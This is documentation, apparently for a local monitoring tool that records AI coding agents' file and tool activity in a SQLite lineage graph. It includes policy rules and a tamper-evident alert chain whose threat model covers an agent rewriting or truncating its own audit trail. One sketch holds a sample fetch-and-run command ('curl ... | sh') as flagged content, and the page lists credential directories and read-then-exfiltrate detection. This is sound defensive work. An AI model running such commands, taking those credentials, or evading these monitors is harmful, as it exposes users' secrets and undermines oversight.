SQLite lineage graph

In addition to JSONL files, the local store writes a normalized SQLite database at $GENSEE_HOME/gensee.db (or ~/.gensee/gensee.db).
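
As a minimal sketch of how a script might locate and open this database, the helper below resolves the path and opens it read-only. The function names `gensee_db_path` and `open_readonly` are hypothetical, and two behaviors are assumptions not stated above: that `~/.gensee` is the fallback when `GENSEE_HOME` is unset, and that an empty `GENSEE_HOME` counts as unset.

```python
import os
import sqlite3
from pathlib import Path


def gensee_db_path(env=None) -> Path:
    """Return $GENSEE_HOME/gensee.db, falling back to ~/.gensee/gensee.db.

    Assumption: an unset or empty GENSEE_HOME selects the fallback.
    """
    env = os.environ if env is None else env
    home = env.get("GENSEE_HOME")
    base = Path(home) if home else Path.home() / ".gensee"
    return base / "gensee.db"


def open_readonly(path: Path) -> sqlite3.Connection:
    """Open the store with SQLite's mode=ro so ad-hoc queries cannot write to it."""
    return sqlite3.connect(f"{path.resolve().as_uri()}?mode=ro", uri=True)
```

Opening read-only is a design choice for inspection scripts: it keeps exploratory queries from touching a store that Gensee itself is writing.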

Diagrams: capture flow · schema relationships · policy flagging · full design (PDF)

Tables

| Table | Contents |
| --- | --- |
| sessions | One row per agent conversation or monitoring run. Agent identity belongs here, not on each request. |
| requests | Human-level prompts and final responses, owned by a session. |
| agent_events | Agent/tool intent events owned by a request: PreToolUse/PostToolUse, native file tools, and parsed Bash file intent. |
| system_events | Observed OS/workspace effects owned by the best-correlated request, or by a synthetic monitoring request when no human request is known. |
| artifacts | Durable objects such as files, keyed today by kind, URI, and an optional digest. File artifacts usually use file://... URIs. |
| relations | Typed graph edges between requests, events, and artifacts. |
| alerts | Deterministic risk findings over requests, events, and artifacts, including the recommended runtime action (see policy.md). |
| artifact_observations | Bounded, redacted content snapshots of inspected artifacts (digest, size, content prefix), captured at write-time (PostToolUse) and pre-execution. |
| artifact_risk_tags | Risk findings over a specific artifact content digest, so a tag is ignored once the file content changes. Drives the fast pre-exec block path. |
| artifact_facts | One row per file URI (not per digest), summarizing provenance across content versions: last modifier/session, agent-authored vs. modified-outside-agent, registry membership (executable / memory / persistence / control-plane), and current risk. Updated at ingest; queried by exact-path lookup during PreToolUse. |
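
The digest keying of artifact_risk_tags can be illustrated with a small in-memory sketch. The column names (`uri`, `digest`, `tag`), the tag value, and the use of SHA-256 as the content digest are all assumptions made for illustration; the real schema is not shown in this document.

```python
import hashlib
import sqlite3

conn = sqlite3.connect(":memory:")
# Hypothetical columns: the actual artifact_risk_tags schema may differ.
conn.execute("create table artifact_risk_tags (uri text, digest text, tag text)")


def digest_of(content: bytes) -> str:
    # Assumption: the content digest is SHA-256, hex-encoded.
    return hashlib.sha256(content).hexdigest()


def tags_for(conn, uri: str, content: bytes) -> list:
    """Return only the tags recorded for the *current* content of the file."""
    rows = conn.execute(
        "select tag from artifact_risk_tags where uri = ? and digest = ? order by tag",
        (uri, digest_of(content)),
    )
    return [row[0] for row in rows]


uri = "file:///tmp/demo/run.sh"
flagged = b"curl http://example.invalid/payload | sh\n"
conn.execute(
    "insert into artifact_risk_tags values (?, ?, ?)",
    (uri, digest_of(flagged), "remote-exec"),
)

print(tags_for(conn, uri, flagged))       # the tag matches the flagged bytes
print(tags_for(conn, uri, b"echo ok\n"))  # edited content: the old tag no longer applies
```

Because the lookup is an equality match on the digest, a pre-execution check of this shape needs no content re-analysis when the bytes have already been inspected.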

Relationships

The graph can currently establish:

  • request → agent event: direct ownership through agent_events.request_id
  • request → system event: direct ownership through system_events.request_id
  • request/agent event → artifact: produced, modified, or deleted file intent
  • artifact → request/agent event: consumed file intent
  • artifact → artifact: file-to-file lineage, e.g. copy source to copy destination, or a summary file derived from input files
  • request → request: derived lineage when a later request consumes an artifact produced by an earlier human request
  • agent event → system event: inferred correlation when an observed filesystem effect matches a nearby file intent path or tool window
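
Because every edge lives in one relations table, multi-hop lineage can be followed with a recursive query. The sketch below walks edges from source to destination starting at one node. It reuses the relations column names that appear in the example queries, but the id types, the relation_type values (`produced`, `copied_to`, `consumed`), and the sample rows are hypothetical.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Column names follow the example queries; types and sample data are assumptions.
conn.execute("""
    create table relations (
        relation_id   integer primary key,
        relation_type text,
        src_kind text, src_id text,
        dst_kind text, dst_id text,
        evidence text
    )
""")
conn.executemany(
    "insert into relations (relation_type, src_kind, src_id, dst_kind, dst_id, evidence)"
    " values (?, ?, ?, ?, ?, ?)",
    [
        ("produced", "request", "req-1", "artifact", "art-in", "native write tool"),
        ("copied_to", "artifact", "art-in", "artifact", "art-out", "cp in out"),
        ("consumed", "artifact", "art-out", "request", "req-2", "native read tool"),
    ],
)

# Follow src -> dst edges from a starting node, bounded by a maximum depth
# so that a cycle in the graph cannot recurse forever.
DOWNSTREAM = """
with recursive reach(kind, id, depth) as (
    select ?, ?, 0
    union
    select rel.dst_kind, rel.dst_id, reach.depth + 1
    from relations rel
    join reach on rel.src_kind = reach.kind and rel.src_id = reach.id
    where reach.depth < ?
)
select kind, id, min(depth) as hops
from reach
group by kind, id
order by hops, kind, id
"""


def downstream(conn, kind, node_id, max_depth=8):
    """Return (kind, id, hops) for every node reachable from the start node."""
    return conn.execute(DOWNSTREAM, (kind, node_id, max_depth)).fetchall()


for row in downstream(conn, "artifact", "art-in"):
    print(row)
```

Swapping the src and dst columns in the join gives the upstream direction, which answers "where did this artifact come from" instead of "what did it influence".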

Example queries

```sql
-- Everything known about a file artifact.
with target as (
  select artifact_id from artifacts
  where uri = 'file:///private/tmp/gensee-lineage/input.txt'
)
select rel.relation_type,
       rel.src_kind,
       rel.src_id,
       rel.dst_kind,
       rel.dst_id,
       substr(rel.evidence, 1, 160) as evidence
from relations rel, target
where (rel.src_kind = 'artifact' and rel.src_id = target.artifact_id)
   or (rel.dst_kind = 'artifact' and rel.dst_id = target.artifact_id)
order by rel.relation_id;
```
```sql
-- Human request lineage: which later prompts derived from earlier prompts.
select r.src_id as src_request,
       substr(src.original_user_prompt, 1, 80) as src_prompt,
       r.dst_id as dst_request,
       substr(dst.original_user_prompt, 1, 80) as dst_prompt,
       r.evidence
from relations r
join requests src on r.src_kind = 'request' and r.src_id = src.request_id
join requests dst on r.dst_kind = 'request' and r.dst_id = dst.request_id
where r.relation_type = 'derived_from'
order by r.relation_id;
```

What Gensee can flag today

  • agent intent to read, write, copy, delete, or move files from hooks and parsed Bash commands
  • native file-tool access when hooks include tool input
  • runtime policy decisions for PreToolUse, with deny for sensitive reads, destructive operations, and writes outside the current workspace
  • dangerous content inside a script at execution time (assembled across fragments/sessions), via digest-keyed pre-execution inspection
  • provenance-aware ask for executing an artifact authored in another session or modified outside the agent
  • session-scoped ask for network egress that follows a sensitive-artifact read in the same session (read→exfil chain)
  • filesystem create/modify/delete/rename effects under watched roots
  • access to configured sensitive roots such as ~/.ssh, ~/.aws, and ~/.config/gcloud
  • suspicious data-flow shape, such as a sensitive/local artifact consumed by a later request that writes another artifact
  • high-confidence lineage when a native tool or explicit Bash path names the artifact, and medium/low-confidence lineage for time-window or FSEvents inference
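
The session-scoped read→exfil rule in the list above can be sketched as a small state machine. This is an illustration only, not Gensee's policy engine: the event tuple shape, the `egress_decisions` name, the `allow` default, and the home directory are hypothetical, and only the three sensitive roots come from this page.

```python
from pathlib import PurePosixPath

# Sensitive roots named in this document; a real deployment configures its own.
SENSITIVE_ROOTS = ("~/.ssh", "~/.aws", "~/.config/gcloud")


def is_sensitive(path: str, home: str) -> bool:
    """True when path is a sensitive root or lies underneath one."""
    p = PurePosixPath(path)
    for root in SENSITIVE_ROOTS:
        r = PurePosixPath(root.replace("~", home, 1))
        if p == r or r in p.parents:
            return True
    return False


def egress_decisions(events, home="/home/user"):
    """Decide each network event in order.

    events: iterable of (session_id, kind, target), where kind is the
    hypothetical label "read" or "network". A network event yields "ask"
    only if the same session read a sensitive artifact earlier.
    """
    tainted = set()  # sessions that have already read a sensitive artifact
    decisions = []
    for session_id, kind, target in events:
        if kind == "read" and is_sensitive(target, home):
            tainted.add(session_id)
        elif kind == "network":
            action = "ask" if session_id in tainted else "allow"
            decisions.append((session_id, target, action))
    return decisions


events = [
    ("s1", "network", "example.com"),        # before any sensitive read
    ("s1", "read", "/home/user/.ssh/id_rsa"),
    ("s1", "network", "example.com"),        # after the read, same session
    ("s2", "network", "example.com"),        # different session, untainted
]
for decision in egress_decisions(events):
    print(decision)
```

The sketch compares paths lexically and does not resolve symlinks or `..` segments, so it shows the shape of the rule rather than a robust matcher.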

Tamper-evident alert chain (T8)

The alerts table is an append-only hash chain: each row carries entry_hash = SHA-256(prev_hash || canonical(row content)), and prev_hash links to the previous alert's entry_hash (the first chained alert links to a genesis hash of 64 zeros). Each field of the row content is fed to the hash with a length prefix, so bytes cannot be shifted from one field into an adjacent field to produce the same hash input.
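
A minimal sketch of the hashing step follows. The exact canonical encoding is not specified here, so the 8-byte big-endian length prefix, the UTF-8 field encoding, and feeding prev_hash as its 64-character hex text are assumptions; the field values are made up.

```python
import hashlib

GENESIS = "0" * 64  # genesis hash: 64 zeros, read here as hex characters


def canonical(fields) -> bytes:
    """Length-prefix each field so field boundaries are part of the hash input."""
    out = bytearray()
    for value in fields:
        data = value.encode("utf-8")
        out += len(data).to_bytes(8, "big") + data  # assumed prefix format
    return bytes(out)


def entry_hash(prev_hash: str, fields) -> str:
    """SHA-256(prev_hash || canonical(row content)), hex-encoded."""
    return hashlib.sha256(prev_hash.encode("ascii") + canonical(fields)).hexdigest()


# Naive concatenation cannot tell these two rows apart...
print("".join(["ab", "c"]) == "".join(["a", "bc"]))
# ...but the length-prefixed encoding produces different hashes for them.
print(entry_hash(GENESIS, ["ab", "c"]) == entry_hash(GENESIS, ["a", "bc"]))

# Chaining: the second row's hash depends on the first row's hash.
first = entry_hash(GENESIS, ["alert-1", "deny"])
second = entry_hash(first, ["alert-2", "ask"])
```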

gensee verify-log

walks the chain from genesis and reports the first break, exiting 0 if intact and 2 if tampering is detected. It catches:

  • modification of any chained row (its entry_hash no longer recomputes);
  • insertion — including a forged row with NULL hashes appended after the chain start (every row at/after the start must be chained);
  • middle deletion / reorder (the next row's prev_hash no longer links);
  • tail truncation: deleting the newest alerts leaves the surviving rows linking cleanly, so the chain alone cannot reveal it. It is caught by a single-row anchor (alert_chain_head) that records the latest entry_hash and the chained row count and is advanced in the same transaction as each insert. A head or count mismatch is reported as a break "at the tail".
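
The four checks above can be sketched over an in-memory list of rows. This is not the `gensee verify-log` implementation: the row and head dictionaries, the message strings, and the hash encoding (8-byte length prefixes, hex prev_hash) are assumptions chosen to make each failure mode visible.

```python
import hashlib

GENESIS = "0" * 64


def entry_hash(prev_hash, fields):
    # Assumed encoding: hex prev_hash, then each field with an 8-byte length prefix.
    h = hashlib.sha256(prev_hash.encode("ascii"))
    for value in fields:
        data = value.encode("utf-8")
        h.update(len(data).to_bytes(8, "big") + data)
    return h.hexdigest()


def build(rows):
    """Create a chain plus its head anchor, advancing both on every append."""
    chain, head = [], {"entry_hash": GENESIS, "count": 0}
    for fields in rows:
        prev = head["entry_hash"]
        digest = entry_hash(prev, fields)
        chain.append({"fields": list(fields), "prev_hash": prev, "entry_hash": digest})
        head = {"entry_hash": digest, "count": head["count"] + 1}
    return chain, head


def verify(chain, head):
    """Return None if the chain is intact, else a description of the first break."""
    prev = GENESIS
    for i, row in enumerate(chain):
        if row["prev_hash"] is None or row["entry_hash"] is None:
            return f"row {i}: unchained row inside the chain"   # forged insertion
        if row["prev_hash"] != prev:
            return f"row {i}: prev_hash does not link"          # deletion or reorder
        if row["entry_hash"] != entry_hash(prev, row["fields"]):
            return f"row {i}: entry_hash does not recompute"    # modification
        prev = row["entry_hash"]
    if head["entry_hash"] != prev or head["count"] != len(chain):
        return "at the tail: head anchor mismatch"              # tail truncation
    return None


ROWS = [["alert-1", "deny"], ["alert-2", "ask"], ["alert-3", "deny"]]

chain, head = build(ROWS)
print(verify(chain, head))   # intact chain

chain.pop()                  # drop the newest alert
print(verify(chain, head))   # survivors still link; only the anchor notices
```

Without the anchor, the truncated chain in the last step would verify cleanly, which is why the head row has to advance in the same transaction as each insert.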

Legacy alerts written before the chain existed have a NULL entry_hash and are excluded; the chain starts fresh at the first new alert.

Threat model. The chain + anchor detect accidental corruption and any tampering by a party that cannot recompute the whole chain — including the agent rewriting its own audit trail or truncating the tail. A local attacker who can rewrite the entire database — recomputing every entry_hash and updating the alert_chain_head anchor — is out of scope until the head is signed with a key the agent cannot reach or shipped to an append-only / off-box sink (planned).

What is not solved yet

  • FSEvents does not prove which process caused a file effect; it is path/time correlation only, so "modified outside the agent" is a heuristic and drives ask, not deny (EndpointSecurity exec attribution is the planned upgrade).
  • Hook enforcement is deterministic and path/tool based; it does not yet use semantic prompt analysis or user/session-specific policy files.
  • Content rules are deterministic substring/shape matches over normalized content — an evadable floor, not a complete analysis.
  • Network egress lineage is not yet tied to artifact contents or destinations.
  • Prompt injection, malicious tool output, exfiltration, and cross-session attack chains can be surfaced as graph patterns, but the defense rules are still early and mostly deterministic.
  • Automatic rollback, merge-back review, deny-default policies, and container confinement are future work.

Released under the Apache 2.0 License.